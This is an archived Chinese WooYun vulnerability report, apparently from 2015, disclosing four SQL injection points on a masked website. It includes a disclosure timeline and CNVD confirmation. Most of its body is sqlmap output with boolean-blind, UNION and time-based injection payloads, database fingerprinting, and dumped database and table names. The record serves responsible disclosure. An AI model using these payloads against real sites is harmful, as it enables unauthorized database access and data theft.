乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-20: 厂商已经确认,细节仅向厂商公开 2015-10-30: 细节向核心白帽子及相关领域专家公开 2015-11-09: 细节向普通白帽子公开 2015-11-19: 细节向实习白帽子公开 2015-12-04: 细节向公众公开
4处打包,懒得刷分
注入为get类型总共4处
http://**.**.**.**/fblog/artview?ID=101&id=15594
http://**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214
**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214
http://**.**.**.**/fblog/index?ID=1850
以这个为例子演示一下
Place: GETParameter: tid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=ftheme&a=listbk&tpl=2&tid=214 AND 5810=5810 Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: m=ftheme&a=listbk&tpl=2&tid=-8154 UNION SELECT NULL, CONCAT(0x3a666a3a,0x4967466c484168714b47,0x3a6562723a)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=ftheme&a=listbk&tpl=2&tid=214 AND SLEEP(5)---[16:24:12] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.3.28, Apache 2.4.9back-end DBMS: MySQL 5.0.11[16:24:12] [INFO] fetching current usercurrent user: 'trqgydb@localhost'
available databases [4]:[*] information_schema[*] test[*] trqgydb[*] trqgydb_en
169表
[16:30:06] [INFO] the SQL query used returns 169 entries[16:30:08] [INFO] retrieved: "[u'information_schema', u'CHARACTER_SETS']"[16:30:10] [INFO] retrieved: "[u'information_schema', u'COLLATIONS']"[16:30:12] [INFO] retrieved: "[u'information_schema', u'COLLATION_CHARACTER_S[16:30:14] [INFO] retrieved: "[u'information_schema', u'COLUMNS']"[16:30:16] [INFO] retrieved: "[u'information_schema', u'COLUMN_PRIVILEGES']"[16:30:18] [INFO] retrieved: "[u'information_schema', u'ENGINES']"[16:30:19] [INFO] retrieved: "[u'information_schema', u'EVENTS']"
危害等级:高
漏洞Rank:10
确认时间:2015-10-20 16:39
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无